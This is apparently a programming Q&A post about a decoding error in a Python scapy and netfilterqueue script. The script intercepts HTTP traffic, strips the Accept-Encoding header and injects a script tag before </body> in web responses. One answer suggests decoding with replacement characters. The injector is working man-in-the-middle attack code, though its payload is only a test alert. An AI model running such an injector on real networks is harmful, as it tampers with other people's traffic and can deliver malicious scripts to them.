# How to decode data from "scapy_packet [scapy.Raw] .load" into a string for modification?

Tags: python, python-3.x, scapy

I am trying to write a program that inserts a small script into a web page, before `</body>`.But the data that is stored in scapy_packet [scapy.Raw] .load is of type bytes. I am trying to decode them to a string, but I always get an error:

> File "code_injector.py", line 21, in process_packet
> load = load.decode('utf-8') UnicodeDecodeError: 'utf-8' codec can't decode byte 0xe7 in position 0: invalid continuation byte

this is my code:

```
import netfilterqueue
import scapy.all as scapy
import re


def set_load(packet, load):
    packet[scapy.Raw].load = load

    del packet[scapy.IP].chksum
    del packet[scapy.IP].len
    del packet[scapy.TCP].chksum
    return packet


def process_packet(packet):
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.Raw):
        load = scapy_packet[scapy.Raw].load     # load = scapy_packet[scapy.Raw].load.decode()
        load = load.decode('utf-8')     # load = load.decode('utf-8', 'ignore')
        if scapy_packet[scapy.TCP].dport == 80:    #HTTP only

            print("This is REQUEST")
            load = re.sub("Accept-Encoding:.*?\\r\\n", "", load)
            # print(scapy_packet.show())

        elif scapy_packet[scapy.TCP].sport == 80:

            print("This is RESPONSE")
            load = load.replace("</body>", "<script>alert('test');</script></body>")
            # print(scapy_packet.show())

        if load != scapy_packet[scapy.Raw].load:
            new_packet = set_load(scapy_packet, load)
            packet.set_payload(bytes(new_packet))    # bytes, not string!

    packet.accept()


queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
```

I tried to ignore the error, but then the site would not load.

```
load = load.decode('utf-8', 'ignore')
```

Other encodings (not utf-8) do not work

my Python is Python 3.8

on Python 2.7 scapy does not work. On Python 3.9 netfilterqueue does not work. :-(

OS - Kali linux.

P.S.: After searching enough time, I think the problem is with the two initial "0x" characters.

P.P.S.: Sorry for my eng...

Answer (score 0):

```
readable_payload = bytes(packet[TCP].payload).decode('UTF8','replace')
```

This code snippet is working ok for decrypting simple HTTP traffice.